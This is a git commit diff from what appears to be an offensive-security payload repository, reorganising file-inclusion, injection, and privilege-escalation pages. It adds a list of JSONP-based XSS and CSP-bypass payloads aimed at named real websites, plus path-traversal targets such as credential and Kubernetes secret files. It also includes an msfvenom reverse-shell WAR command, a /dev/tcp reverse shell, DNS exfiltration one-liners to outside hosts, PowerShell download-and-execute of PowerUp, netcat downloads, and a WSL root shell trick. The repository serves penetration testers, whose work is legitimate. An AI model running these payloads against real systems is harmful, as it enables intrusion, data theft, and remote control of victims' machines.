Architecture - Files/Intruder/Images and README + template

2024-12-12 14:22:47 +00:00 · 2018-12-23 00:45:45 +01:00 · 2018-12-23 00:45:45 +01:00 · b4aff1a826
commit b4aff1a826
parent e096d10a30
53 changed files with 133 additions and 29 deletions
--- a/Traversal/Intruders/Web-files.txt
+++ b/Traversal/Intruders/Web-files.txt
@ -11,3 +11,4 @@ wp-admin.php
 /inc/mysql.php
 /sites/defaults/settings.php
 /phpmyadmin/changelog.php
 web.config
--- a/Traversal/README.md
+++ b/Traversal/README.md
@ -1,13 +1,16 @@
-# Local/Remote File Inclusion
+# File Inclusion - Path Traversal
 The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
 ## Summary
 * [Path Traversal](#path-traversal)
 * [Basic LFI](#basic-lfi)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
-  * [Wrapper php://filter](l#wrapper-phpfilter)
+  * [Wrapper php://filter](#wrapper-phpfilter)
  * [Wrapper zip://](#wrapper-zip)
  * [Wrapper data://](#wrapper-data)
  * [Wrapper expect://](#wrapper-expect)
@ -21,6 +24,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
 ## Path Traversal
 Linux - Interesting files to check out :
 ```powershell
@ -81,6 +87,13 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/mail
 ```
 Other easy win files.
 ```powershell
 /home/$USER/.bash_history
 /var/run/secrets/kubernetes.io/serviceaccount
 ```
 ## Basic LFI
 ```powershell
--- a/interface/intruders/springboot_actuator.txt
+++ b/interface/intruders/springboot_actuator.txt
--- a/injection/Intruders/LDAP_FUZZ.txt
+++ b/injection/Intruders/LDAP_FUZZ.txt
--- a/injection/Intruders/LDAP_attributes.txt
+++ b/injection/Intruders/LDAP_attributes.txt
--- a/Resources/Network
+++ b/Resources/Network
@ -40,6 +40,8 @@ bettercap -X --proxy --proxy-https -T <target IP>
 ```powershell
 nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
 -sn : Disable port scanning. Host discovery only.
 -n : Never do DNS resolution
 ```
 * Basic NMAP
--- a/Resources/Reverse
+++ b/Resources/Reverse
@ -114,6 +114,14 @@ p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while rea
 p.waitFor()
 ```
 ### War
 ```java
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
 strings reverse.war | grep jsp # in order to get the name of the file
 ```
 ### Lua
 Linux only
--- a/Resources/Windows
+++ b/Resources/Windows
@ -1,7 +1,5 @@
 # Windows - Privilege Escalation
 Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
 ## Windows Version and Configuration
 ```powershell
@ -132,7 +130,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K
 REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 ```
-### Password in unattend.xml
+### Passwords in unattend.xml
 Location of the unattend.xml files
@ -167,7 +165,7 @@ Example content
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
-## Processes Enum
+## Processes Enumeration
 What processes are running?
@ -187,32 +185,27 @@ Do you have powershell magic?
 REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
 ```
-## Uploading / Downloading files
+## Using PowerSploit's PowerUp
-a wget using powershell
+Spot the weak service using PowerSploit's PowerUp
 ```powershell
 powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
 ```
 wget using bitsadmin (when powershell is not present)
 ```powershell
 cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
 ```
 now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
 ```powershell
 %TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
 ```
 ## Spot the weak service using PowerSploit's PowerUP
 ```powershell
 powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
 ```
 ## Using Windows Subsystem for Linux (WSL)
 Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
 > With root privileges Windows  Subsystem for Linux (WSL)  allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
 ```powershell
 wsl whoami
 ./ubuntun1604.exe config --default-user root
 wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
 ## Thanks to
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
@ -220,3 +213,4 @@ powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadS
 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
 * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
 * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
--- a/injection/Intruders/NoSQL.txt
+++ b/injection/Intruders/NoSQL.txt
--- a/redirect/Intruder/Open-Redirect-payloads.txt
+++ b/redirect/Intruder/Open-Redirect-payloads.txt
--- a/redirect/Intruder/open_redirect_wordlist.txt
+++ b/redirect/Intruder/open_redirect_wordlist.txt
--- a/redirect/Intruder/openredirects.txt
+++ b/redirect/Intruder/openredirects.txt
--- a/execution/Intruders/command-execution-unix.txt
+++ b/execution/Intruders/command-execution-unix.txt
--- a/execution/Intruders/command_exec.txt
+++ b/execution/Intruders/command_exec.txt
--- a/execution/README.md
+++ b/execution/README.md
@ -152,6 +152,10 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi
 for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 ```powershell
 $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
 ```
 ## Thanks to
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
--- a/injection/Intruders/Auth_Bypass.txt
+++ b/injection/Intruders/Auth_Bypass.txt
--- a/injection/Intruders/Auth_Bypass2.txt
+++ b/injection/Intruders/Auth_Bypass2.txt
--- a/injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt
+++ b/injection/Intruders/FUZZDB_MSSQL-WHERE_Time.txt
--- a/injection/Intruders/FUZZDB_MSSQL.txt
+++ b/injection/Intruders/FUZZDB_MSSQL.txt
--- a/injection/Intruders/FUZZDB_MSSQL_Enumeration.txt
+++ b/injection/Intruders/FUZZDB_MSSQL_Enumeration.txt
--- a/injection/Intruders/FUZZDB_MYSQL.txt
+++ b/injection/Intruders/FUZZDB_MYSQL.txt
--- a/injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt
+++ b/injection/Intruders/FUZZDB_MySQL-WHERE_Time.txt
--- a/injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt
+++ b/injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt
--- a/injection/Intruders/FUZZDB_Oracle.txt
+++ b/injection/Intruders/FUZZDB_Oracle.txt
--- a/injection/Intruders/FUZZDB_Postgres_Enumeration.txt
+++ b/injection/Intruders/FUZZDB_Postgres_Enumeration.txt
--- a/injection/Intruders/Generic_ErrorBased.txt
+++ b/injection/Intruders/Generic_ErrorBased.txt
--- a/injection/Intruders/Generic_TimeBased.txt
+++ b/injection/Intruders/Generic_TimeBased.txt
--- a/injection/Intruders/Generic_UnionSelect.txt
+++ b/injection/Intruders/Generic_UnionSelect.txt
--- a/injection/Intruders/SQL-Injection
+++ b/injection/Intruders/SQL-Injection
--- a/injection/Intruders/SQLi_Polyglots.txt
+++ b/injection/Intruders/SQLi_Polyglots.txt
--- a/injection/Intruders/payloads-sql-blind-MSSQL-INSERT
+++ b/injection/Intruders/payloads-sql-blind-MSSQL-INSERT
--- a/injection/Intruders/payloads-sql-blind-MSSQL-WHERE
+++ b/injection/Intruders/payloads-sql-blind-MSSQL-WHERE
--- a/injection/Intruders/payloads-sql-blind-MySQL-INSERT
+++ b/injection/Intruders/payloads-sql-blind-MySQL-INSERT
--- a/injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
+++ b/injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
--- a/injection/Intruders/payloads-sql-blind-MySQL-WHERE
+++ b/injection/Intruders/payloads-sql-blind-MySQL-WHERE
--- a/injection/Files/ip.py
+++ b/injection/Files/ip.py
--- a/injection/Images/Parser
+++ b/injection/Images/Parser
--- a/injection/Images/SSRF_Parser.png
+++ b/injection/Images/SSRF_Parser.png
--- a/injection/Images/WeakParser.jpg
+++ b/injection/Images/WeakParser.jpg
--- a/injection/README.md
+++ b/injection/README.md
@ -168,7 +168,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/
 http://127.1.1.1:80#\@127.2.2.2:80/
 ```
-![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg)
+![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg)
 ## SSRF via URL Scheme
--- a/injections/Images/serverside.png
+++ b/injections/Images/serverside.png
--- a/injections/Intruders/JHADDIX_SSI_Injection.txt
+++ b/injections/Intruders/JHADDIX_SSI_Injection.txt
--- a/injections/Intruders/ssi_quick.txt
+++ b/injections/Intruders/ssi_quick.txt
--- a/execution/Files/--checkpoint-action=exec=sh
+++ b/execution/Files/--checkpoint-action=exec=sh
--- a/execution/Files/--checkpoint=1
+++ b/execution/Files/--checkpoint=1
--- a/execution/Files/shell.sh
+++ b/execution/Files/shell.sh
--- a/directory/Intruder/deep_traversal.txt
+++ b/directory/Intruder/deep_traversal.txt
--- a/directory/Intruder/directory_traversal.txt
+++ b/directory/Intruder/directory_traversal.txt
--- a/directory/Intruder/dotdotpwn.txt
+++ b/directory/Intruder/dotdotpwn.txt
--- a/directory/Intruder/traversals-8-deep-exotic-encoding.txt
+++ b/directory/Intruder/traversals-8-deep-exotic-encoding.txt
--- a/injection/Intruders/jsonp_endpoint.txt
+++ b/injection/Intruders/jsonp_endpoint.txt
@ -0,0 +1,54 @@
 #Google.com:
 "><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
 "><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
 "><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
 "><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
 #Blogger.com:
 "><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
 #Yandex:
 "><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
 "><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
 #VK.com:
 "><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
 #Marketo.com
 "><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
 "><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
 #AlibabaGroup:
 "><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script>
 "><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script>
 "><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script>
 "><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
 "><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script>
 "><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script>
 "><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>
 #Uber.com:
 "><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
 #AOL/Yahoo
 "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
 "><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
 "><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
 "><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
 "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
 "><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
 "><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>
 #Twitter.com:
 "><script+src="http://search.twitter.com/trends.json?callback=alert()"></script>
 "><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script>
 "><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script>
 #Others:
 "><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script>
 "><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script>
 "><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script>
 "><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script>
 "><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>
 "><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script>
 "><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script>
 "><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script>
 "><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>
 "><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script>
 "><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script>
 "><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script>
 #GoogleAPI's
 "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
 "><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
 ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
--- a/injection/README.md
+++ b/injection/README.md
@ -778,6 +778,8 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi
 <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
 ```
 More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
 ### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
 Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)
--- a/_template_vuln/README.md
+++ b/_template_vuln/README.md
@ -0,0 +1,26 @@
 # Vulnerability Title
 > Vulnerability description - reference
 Tools:
 - [Tool name - description](https://example.com)
 ## Summary
 * [Something](#something)
 * [Something](#something)
  * [Subentry 1](#sub1)
  * [Subentry 2](#sub2)
 ## Something
 Quick explanation
 ```powershell
 Exploit
 ```
 ## Reference
 - [Blog title - Author, Date](https://example.com)